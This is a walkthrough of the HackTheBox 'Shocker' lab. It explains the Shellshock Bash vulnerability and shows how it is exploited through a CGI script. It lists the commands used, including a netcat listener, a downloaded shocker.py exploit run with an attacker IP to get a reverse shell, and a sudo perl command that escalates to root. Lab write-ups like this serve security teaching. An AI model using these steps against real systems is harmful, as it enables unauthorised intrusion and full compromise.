What Is Shellshock?
Shellshock was a major vulnerability that affected versions of Bash (the Bourne-Again Shell) before version 4.3. Bash is the command-line interface that many of us use to interact with Linux and Mac systems. The bug was particularly dangerous on web servers running Apache with CGI-bin scripts and on systems using OpenSSH.
The core of the problem was that an attacker could trick a vulnerable version of Bash into running arbitrary commands. In the context of a web server, this meant an attacker could send a specially crafted HTTP request and get the server to execute commands, leading to a full compromise.
The best way to fix this, of course, is to update Bash to a patched version and to be very careful about what scripts are running in your CGI-bin directory.
In this post, we covered the demonstration, exploitation and mitigation of The ShellShock Vulnerability. We used the lab material of HackTheBox Shocker.
The Live Hack
For my demonstration, I’m targeting a machine that’s running an Apache web server.
- Reconnaissance: I start with an Nmap scan and find that ports 80 (for HTTP) and 2222 (for SSH) are open. I then use a tool called dirb to look for hidden directories on the web server and quickly find a
cgi-bin
directory. A further search inside that directory reveals a Bash script nameduser.sh
. - Proof of Concept: Now that I have a target script, I need to see if it’s vulnerable. I use the
curl
command to send a specially crafted HTTP request to the script. My payload is a simple ping command that tries to ping my own machine. I fire up tcpdump on my end to listen for the incoming ping, but it doesn’t work. - Getting a Shell: Since the ping didn’t work, I switch to a more direct approach: a reverse shell. I craft a new
curl
command, but this time, the payload is a one-liner that will create a reverse shell connection back to my machine. I start a Netcat listener on my end, send the request, and just like that, I get a shell on the target machine! - Trying Another Way: Just to show there’s more than one way to do this, I also use a Python script called
shocker.py
that automates the Shellshock exploit. I download the script, run it with the target’s information, and get a second reverse shell. - Privilege Escalation: Now that I’m in, I need to get root access. I run
sudo -l
to see what commands I can run withsudo
. It turns out I can runperl
as the root user without a password. This is a huge win! I use a simpleperl
command to execute a shell, and because I ran it withsudo
, the shell I get is a root shell. 👑
From there, I can navigate to the /root
directory and grab the final flag.
Technical Commands
Here’s a list of the commands I used in my terminal to exploit Shellshock and own this machine:
- Directory Brute-forcing:
dirb http://10.10.10.56
dirb http://10.10.10.56/cgi-bin/ -X .py,.sh
- Interacting with the Web Server:
curl http://10.10.10.56/cgi-bin/user.sh
- Network Utilities:
ifconfig
sudo tcpdump -i tun0
nc -lvp 4545
- Exploitation Scripts:
wget https://raw.githubusercontent.com/opsxcq/exploit-bashbug/master/shocker.py
python shocker.py -H 10.10.10.56 -u /cgi-bin/user.sh -l 10.10.14.7 -p 4546
- Privilege Escalation:
id
sudo -l
sudo perl -e 'exec "/bin/bash";'
- Basic Navigation:
ls
,pwd
,cd /root